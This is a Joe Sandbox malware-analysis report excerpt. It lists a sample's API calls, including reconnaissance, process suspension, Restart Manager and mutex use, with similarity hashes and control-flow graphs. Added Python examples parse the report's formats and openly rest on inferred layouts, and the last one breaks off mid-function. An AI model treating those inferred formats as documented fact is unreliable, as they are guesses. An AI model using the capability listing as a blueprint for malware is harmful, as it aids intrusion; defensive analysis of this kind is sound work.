                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction ID: f64eefb5bd9f523e8549be03835d48176e99c8d604bca3b150ca429985d4114e
                  • Opcode Fuzzy Hash: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction Fuzzy Hash: E6210CB1A10A05C2EF589F24E9CA3D527B4FB547A0F98127AD56D426E9DB38C69BC300
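                  Every function entry above names its memory dump by a dotted .sdmp identifier and the same seven associated regions. The Python below is added here as a worked example and is not part of the Joe Sandbox report or its tooling: it parses those names so the regions can be grouped by page protection and checked against the IDA-plugin snapshot name. The field layout it assumes (pid, phase, dump id, address, protection, type, plus two fields left undecoded) is inferred from this report rather than documented: the PID 0x16 = 22, the phase 2 and the base 0x13F5F0000 line up with hcaresult_22_2_13f5f0000_winiti.jbxd and the Offset line, and the protection and type values are consistent with the winnt.h PAGE_* and MEM_IMAGE constants. The seven dump names in REPORT_DUMPS are copied from the entries above.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# winnt.h memory-protection constants; the low byte of the protect field is looked up here.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x01000000  # winnt.h: the region is backed by a mapped PE image

# ASSUMED layout of a Joe Sandbox .sdmp file name, inferred from this report only:
#   <pid>.<phase>.<dump id>.<address>.<protect>.<unknown1>.<type>.<unknown2>.sdmp
HEX8 = r"[0-9A-Fa-f]{8}"
SDMP_RE = re.compile(
    rf"^(?P<pid>{HEX8})\.(?P<phase>{HEX8})\.(?P<dump_id>[0-9A-Fa-f]+)\."
    rf"(?P<address>[0-9A-Fa-f]{{16}})\.(?P<protect>{HEX8})\.(?P<unknown1>{HEX8})\."
    rf"(?P<mem_type>{HEX8})\.(?P<unknown2>{HEX8})\.sdmp$"
)
# Snapshot names on this page look like hcaresult_<pid>_<phase>_<module base hex>_<tag>.jbxd
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_\w+\.jbxd$")


@dataclass(frozen=True)
class Sdmp:
    pid: int
    phase: int
    dump_id: str
    address: int
    protect: int
    mem_type: int
    unknown: Tuple[str, str]  # fields 6 and 8, kept raw because their meaning is not known

    @property
    def protect_name(self) -> str:
        # Mask off PAGE_GUARD (0x100) / PAGE_NOCACHE (0x200) modifier bits before lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def is_executable(self) -> bool:
        return bool(self.protect & 0xF0)  # the PAGE_EXECUTE* values live in the high nibble

    @property
    def is_image(self) -> bool:
        return bool(self.mem_type & MEM_IMAGE)


def parse_sdmp(name: str) -> Sdmp:
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return Sdmp(
        pid=int(m["pid"], 16), phase=int(m["phase"], 16), dump_id=m["dump_id"],
        address=int(m["address"], 16), protect=int(m["protect"], 16),
        mem_type=int(m["mem_type"], 16), unknown=(m["unknown1"], m["unknown2"]),
    )


def parse_snapshot(name: str) -> Tuple[int, int, int]:
    """(pid, phase, module base) from an IDA-plugin snapshot file name."""
    m = SNAPSHOT_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised snapshot name: {name}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3), 16)


def belongs_to_snapshot(dump: Sdmp, snapshot: str, module_base: int) -> bool:
    """True when the dump comes from the same process and phase as the snapshot and
    starts at or above the module base the report gives in its Offset line."""
    pid, phase, base = parse_snapshot(snapshot)
    return (dump.pid, dump.phase) == (pid, phase) and base == module_base and dump.address >= base


def layout_summary(dumps: Iterable[Sdmp]) -> Dict[str, List[int]]:
    """Group region start addresses by protection, which separates code from data."""
    out: Dict[str, List[int]] = defaultdict(list)
    for d in sorted(dumps, key=lambda d: d.address):
        out[d.protect_name].append(d.address)
    return dict(out)


# Dump names copied from the function entries above (process 0x16 = 22, phase 2).
REPORT_DUMPS = [
    "00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmp",
    "00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp",
    "00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmp",
    "00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp",
    "00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmp",
    "00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmp",
    "00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmp",
]
SNAPSHOT = "hcaresult_22_2_13f5f0000_winiti.jbxd"
MODULE_BASE = 0x13F5F0000  # the "Offset:" value the report gives for the source file


if __name__ == "__main__":
    dumps = [parse_sdmp(n) for n in REPORT_DUMPS]
    for d in dumps:
        print(f"{d.address:#x} {d.protect_name:<20} image={d.is_image} "
              f"in_snapshot={belongs_to_snapshot(d, SNAPSHOT, MODULE_BASE)}")
    print(layout_summary(dumps))
```

                  Run on the seven names, the only PAGE_EXECUTE_READ region is the one at 0x13F5F1000 that the entries cite as their source file, which is the code section the IDA plugin analysed; the PAGE_READWRITE regions are where runtime data such as a decrypted configuration would be looked for.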

                  Execution Graph

                  Execution Coverage:1.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:2.7%
                  Total number of Nodes:728
                  Total number of Limit Nodes:10
                  execution_graph: [node and edge data of the interactive execution-graph viewer; not reproducible as text. The API calls reached from this function are listed under "APIs" below.]

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                  • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                  • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                  • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                  • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                  • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad$HandleModule
                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                  • API String ID: 4236061018-3687161714
                  • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                  • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                  • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                  • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                  Control-flow Graph

                  APIs
                  • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                  • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                  • ExitProcess.KERNEL32 ref: 004432EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID: PkGNG
                  • API String ID: 1703294689-263838557
                  • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                  • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                  • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                  • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
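The API ID shown in each Similarity block (for instance Process$CurrentExitTerminate just above) is a normalized summary of the function's API call list, not a hash. The Python below is an added example, not Joe Sandbox's own code; it reconstructs the derivation from the listings on this page. Each API name is split into fragments at uppercase letters, fragments of three characters or fewer (Get, Set, Rtl, For, Tls, Ex, A, W and similar) are dropped, the surviving fragments are counted across every call listed for the function (repeats and "Part of subcall function" entries included), and the fragments are grouped by count, highest group first, sorted by code point inside a group and joined with $. The split rule and the length cut-off are inferred from the values in this section, not documented behaviour; the function names, MIN_FRAGMENT_LEN and SAMPLES are mine, and the sample call lists are copied from functions on this page.

```python
import re
from collections import Counter

# Fragments start at each uppercase letter; a leading run without uppercase
# ("closesocket", "__freea", "__alloca_probe_16") is one fragment of its own.
_FRAGMENT_RE = re.compile(r"[A-Z][^A-Z]*|[^A-Z]+")

# Assumption inferred from the IDs on this page: fragments of three characters or
# fewer (Get, Set, Rtl, For, Tls, Cxx, Map, Ex, A, W, ...) never reach an API ID.
MIN_FRAGMENT_LEN = 4


def api_fragments(api_name):
    """Fragments of one API name that survive into the API ID, in name order."""
    return [f for f in _FRAGMENT_RE.findall(api_name) if len(f) >= MIN_FRAGMENT_LEN]


def api_id(api_calls):
    """Rebuild the API ID for one function from its API call list.

    api_calls holds one entry per listed call, repeats and 'Part of subcall
    function' entries included, exactly as the report prints them.
    Fragments are counted across all calls, grouped by count (highest group
    first), sorted by code point inside a group ('Wait' before '_free' before
    'send'), and the groups are joined with '$'.
    """
    counts = Counter(f for name in api_calls for f in api_fragments(name))
    by_count = {}
    for fragment, n in counts.items():
        by_count.setdefault(n, []).append(fragment)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


# Call lists copied from functions in this section, keyed by the API ID the
# report prints for them (constructed test data, not parsed from the report).
SAMPLES = {
    "Process$CurrentExitTerminate": [
        "GetCurrentProcess", "TerminateProcess", "ExitProcess"],
    "CloseEventHandle$ObjectSingleWait$closesocket": [
        "WaitForSingleObject", "SetEvent", "CloseHandle", "closesocket",
        "WaitForSingleObject", "SetEvent", "WaitForSingleObject", "SetEvent",
        "CloseHandle", "CloseHandle", "SetEvent", "CloseHandle"],
    "CreateErrorLastMutex": ["CreateMutexA", "GetLastError"],
    "_free$ErrorLast_abort": [
        "GetLastError", "_free", "SetLastError", "_abort", "_abort", "_free",
        "GetOEMCP", "_free", "_free"],
    "ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap": [
        "MultiByteToWideChar", "__alloca_probe_16", "MultiByteToWideChar",
        "__alloca_probe_16", "WideCharToMultiByte", "__freea",
        "RtlAllocateHeap", "__freea", "__freea"],
}

if __name__ == "__main__":
    for expected, calls in SAMPLES.items():
        got = api_id(calls)
        print("OK " if got == expected else "BAD", got)
```

Because the ID discards short fragments, two functions that differ only in which Get*/Set* variant or A/W suffix they call collapse to the same API ID; the numeric API String ID pair printed beneath it is not reproduced here.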
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                  • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                  • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                  • Instruction Fuzzy Hash:

                  Control-flow Graph

                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                  • SetEvent.KERNEL32(?), ref: 00404E43
                  • CloseHandle.KERNELBASE(?), ref: 00404E4C
                  • closesocket.WS2_32(?), ref: 00404E5A
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                  • SetEvent.KERNEL32(?), ref: 00404EA2
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                  • SetEvent.KERNEL32(?), ref: 00404EBA
                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                  • SetEvent.KERNEL32(?), ref: 00404ED1
                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                  • String ID: PkGNG
                  • API String ID: 3658366068-263838557
                  • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                  • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                  • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                  • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Control-flow Graph (serialized below: each basic block appears as "id start-end", or as a single address when the block holds one instruction, followed by the call <address> targets and API names executed in that block; edges between block ids appear as src->dst)

                  control_flow_graph 22 44ac49-44ac62 23 44ac64-44ac74 call 446766 22->23 24 44ac78-44ac7d 22->24 23->24 34 44ac76 23->34 26 44ac7f-44ac87 24->26 27 44ac8a-44acae MultiByteToWideChar 24->27 26->27 28 44acb4-44acc0 27->28 29 44ae41-44ae54 call 434fcb 27->29 31 44ad14 28->31 32 44acc2-44acd3 28->32 38 44ad16-44ad18 31->38 35 44acd5-44ace4 call 457190 32->35 36 44acf2-44ad03 call 446137 32->36 34->24 41 44ae36 35->41 49 44acea-44acf0 35->49 36->41 50 44ad09 36->50 38->41 42 44ad1e-44ad31 MultiByteToWideChar 38->42 43 44ae38-44ae3f call 435e40 41->43 42->41 46 44ad37-44ad49 call 448bb3 42->46 43->29 51 44ad4e-44ad52 46->51 53 44ad0f-44ad12 49->53 50->53 51->41 54 44ad58-44ad5f 51->54 53->38 55 44ad61-44ad66 54->55 56 44ad99-44ada5 54->56 55->43 57 44ad6c-44ad6e 55->57 58 44ada7-44adb8 56->58 59 44adf1 56->59 57->41 60 44ad74-44ad8e call 448bb3 57->60 62 44add3-44ade4 call 446137 58->62 63 44adba-44adc9 call 457190 58->63 61 44adf3-44adf5 59->61 60->43 75 44ad94 60->75 66 44adf7-44ae10 call 448bb3 61->66 67 44ae2f-44ae35 call 435e40 61->67 62->67 74 44ade6 62->74 63->67 78 44adcb-44add1 63->78 66->67 80 44ae12-44ae19 66->80 67->41 79 44adec-44adef 74->79 75->41 78->79 79->61 81 44ae55-44ae5b 80->81 82 44ae1b-44ae1c 80->82 83 44ae1d-44ae2d WideCharToMultiByte 81->83 82->83 83->67 84 44ae5d-44ae64 call 435e40 83->84 84->43
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                  • __alloca_probe_16.LIBCMT ref: 0044ACDB
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                  • __alloca_probe_16.LIBCMT ref: 0044ADC0
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                  • __freea.LIBCMT ref: 0044AE30
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • __freea.LIBCMT ref: 0044AE39
                  • __freea.LIBCMT ref: 0044AE5E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                  • String ID: $C$PkGNG
                  • API String ID: 3864826663-3740547665
                  • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                  • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                  • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                  • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

                  Control-flow Graph

                  control_flow_graph 95 448566-44857a 96 448587-4485a2 LoadLibraryExW 95->96 97 44857c-448585 95->97 99 4485a4-4485ad GetLastError 96->99 100 4485cb-4485d1 96->100 98 4485de-4485e0 97->98 101 4485bc 99->101 102 4485af-4485ba LoadLibraryExW 99->102 103 4485d3-4485d4 FreeLibrary 100->103 104 4485da 100->104 105 4485be-4485c0 101->105 102->105 103->104 106 4485dc-4485dd 104->106 105->100 107 4485c2-4485c9 105->107 106->98 107->106
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                  • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                  • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                  • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                  • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

                  Control-flow Graph

                  control_flow_graph 108 448bb3-448bd5 call 4484ca 110 448bda-448be1 108->110 111 448be3-448c08 110->111 112 448c0a-448c24 call 448c3b LCMapStringW 110->112 116 448c2a-448c38 call 434fcb 111->116 112->116
                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx$PkGNG
                  • API String ID: 2568140703-1065776982
                  • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                  • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                  • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                  • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99

                  Control-flow Graph

                  control_flow_graph 120 40d069-40d095 call 401fab CreateMutexA GetLastError
                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                  • GetLastError.KERNEL32 ref: 0040D083
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID: SG
                  • API String ID: 1925916568-3189917014
                  • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                  • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                  • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                  • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
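The control_flow_graph text printed under each Control-flow Graph heading is the graph itself in serialized form: a decimal block id, the block's address range (a single address for a one-instruction block), then any call targets and API names executed in that block, with src->dst edges between block ids. The Python below is an added example, not part of the report and not Joe Sandbox code; it parses that text into blocks and edges so a graph can be queried offline. The two embedded inputs are copied verbatim from the CreateMutexA function directly above and from the LoadLibraryExW function earlier in this section. The tokenization rules (a decimal id is always followed by a 4-8 digit hex range, "call" is always followed by a hex address, and any other token is an API name) are inferred from the dumps on this page; the Block type and the function names are mine.

```python
import re
from dataclasses import dataclass, field

# Constructed inputs: both strings are copied verbatim from control_flow_graph
# dumps in this report (the CreateMutexA function and the LoadLibraryExW function).
MUTEX_CFG = "control_flow_graph 120 40d069-40d095 call 401fab CreateMutexA GetLastError"
LOADLIB_CFG = (
    "control_flow_graph 95 448566-44857a 96 448587-4485a2 LoadLibraryExW 95->96 "
    "97 44857c-448585 95->97 99 4485a4-4485ad GetLastError 96->99 100 4485cb-4485d1 96->100 "
    "98 4485de-4485e0 97->98 101 4485bc 99->101 102 4485af-4485ba LoadLibraryExW 99->102 "
    "103 4485d3-4485d4 FreeLibrary 100->103 104 4485da 100->104 105 4485be-4485c0 101->105 "
    "102->105 103->104 106 4485dc-4485dd 104->106 105->100 107 4485c2-4485c9 105->107 "
    "106->98 107->106")

_ADDR_RANGE_RE = re.compile(r"^([0-9a-f]{4,8})(?:-([0-9a-f]{4,8}))?$")
_EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # targets of "call <addr>" inside the block
    apis: list = field(default_factory=list)   # imported API names executed in the block


def parse_cfg(text):
    """Parse one serialized graph into ({block_id: Block}, [(src, dst), ...])."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif tok == "call":
            i += 1                                   # callee address follows "call"
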